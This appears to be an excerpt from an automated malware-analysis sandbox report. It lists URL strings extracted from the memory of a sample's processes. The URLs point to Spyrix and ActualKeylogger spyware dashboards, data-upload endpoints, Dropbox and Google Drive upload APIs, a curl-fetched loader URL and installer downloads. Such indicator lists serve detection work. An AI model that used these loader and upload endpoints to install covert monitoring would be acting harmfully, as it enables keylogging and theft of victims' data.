Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/purchase.php
Source: 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/terms-of-use.php)
Source: spkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.net/ibann
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/commit_chunked_upload
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/dropbox
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/sandbox
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/dropbox
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/sandbox
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token
Source: spkl.exe	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?SV
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token?
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/dropbox
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/sandbox
Source: 404.tmp, 0000000D.00000003.2999750559.000000000330B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cdndownload.net/proxy/list.json
Source: curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: cmd.exe, 00000004.00000003.1442867022.0000000002D24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk#
Source: curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk$
Source: curl.exe, 00000009.00000002.1457904714.0000000002BA4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1457615010.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk5
Source: cmd.exe, 00000004.00000003.1458085591.0000000002D24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk=
Source: curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkE=E
Source: cmd.exe, 00000004.00000003.1442867022.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457776016.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
Source: curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkZ
Source: cmd.exe, 00000004.00000003.1442867022.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457776016.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
Source: curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkd
Source: curl.exe, 00000009.00000002.1457841190.0000000002B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkurlrc
Source: spkl.exe, 00000033.00000002.3256791035.0000000007C91000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.00000000018B5000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: qrl.exe, 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000000.3111598222.000000000058A000.00000008.00000001.01000000.00000018.sdmp	String found in binary or memory: https://curl.haxx.se/P
Source: qrl.exe, 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000000.3111598222.000000000058A000.00000008.00000001.01000000.00000018.sdmp	String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
Source: qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com
Source: spkl.exe	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-program
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-programspsMapspsJSON
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.clevercontrol.com/account/user-hash-gen
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com
Source: spkl.exe, 00000033.00000002.3256791035.0000000007C25000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.00000000018C2000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3256791035.0000000007C30000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3256791035.0000000007CC5000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.00000000044E6000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3254442560.00000000075FE000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3256791035.0000000007C91000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/
Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/.com/
Source: spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/
Source: spkl.exe, 00000033.00000002.3244401024.00000000044E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/1
Source: spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/6s
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program
Source: 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program?email=
Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/olUsage
Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/x.com/
Source: 404.exe, 00000000.00000002.1648823536.0000000002692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com
Source: 404.exe, 00000000.00000002.1648823536.000000000266E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
Source: 404.exe, 00000000.00000002.1648823536.000000000266E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s148
Source: 404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.000000000215E000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.00000000032CE000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step1
Source: 404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.000000000215E000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.00000000032CE000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step18
Source: 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step2
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000002.3247512604.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
Source: spkl.exe, 00000033.00000003.3148880064.00000000001E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/das
Source: 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/av
Source: spkl.exe, 00000033.00000002.3256791035.0000000007CC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-
Source: spkl.exe, 00000033.00000003.3162106405.0000000007C91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actio
Source: qrl.exe	String found in binary or memory: https://spyrix.net/dashboard/prg-actions
Source: qrl.exe, 00000041.00000002.3109418320.0000000001180000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000041.00000002.3108663163.0000000001080000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsC:
Source: qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions_
Source: qrl.exe, 00000041.00000002.3110605698.0000000001570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionssfk/sfk
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/proxy/upload
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/rand.zip
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/
Source: 404.tmp, 0000000D.00000003.2999750559.000000000330B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/access.txt
Source: 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iorder.php?comp_id=
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iupload.php
Source: cmd.exe, 0000003C.00000002.3002253080.0000000002BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.sp
Source: 404.tmp, 0000000D.00000003.2999009380.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3006986146.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spy
Source: WMIC.exe, 00000011.00000002.1757964117.000000000296E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyr
Source: WMIC.exe, 00000015.00000002.1767737692.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-s
Source: WMIC.exe, 00000015.00000002.1767737692.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setu
Source: qrl.exe	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: timeout.exe, 0000003B.00000002.3053677227.00000000005D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe(
Source: 404.tmp, 0000000D.00000002.3015844137.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe.
Source: reg.exe, 00000019.00000002.1770050165.000001F3DECF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe6
Source: 404.tmp, 0000000D.00000002.3018349690.0000000002180000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3233766456.00000000031F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=
Source: WMIC.exe, 00000011.00000002.1757964117.000000000296E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C
Source: qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
Source: regedit.exe, 00000030.00000002.2946808699.0000000000C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=ffkFp&
Source: wscript.exe, 00000034.00000002.2963843262.00000000032F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeR
Source: curl.exe, 0000000A.00000002.1709007892.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1709050873.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
Source: curl.exe, 0000000A.00000002.1709007892.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1709050873.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
Source: WMIC.exe, 00000015.00000002.1767737692.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exej
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/repository.0
Source: spkl.exe	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=open
Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/drive
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/auth/userinfo.prof
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.profile
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/about
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/drive/v2/files
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/U
Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files?maxResults=1000&q=
Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/filesU
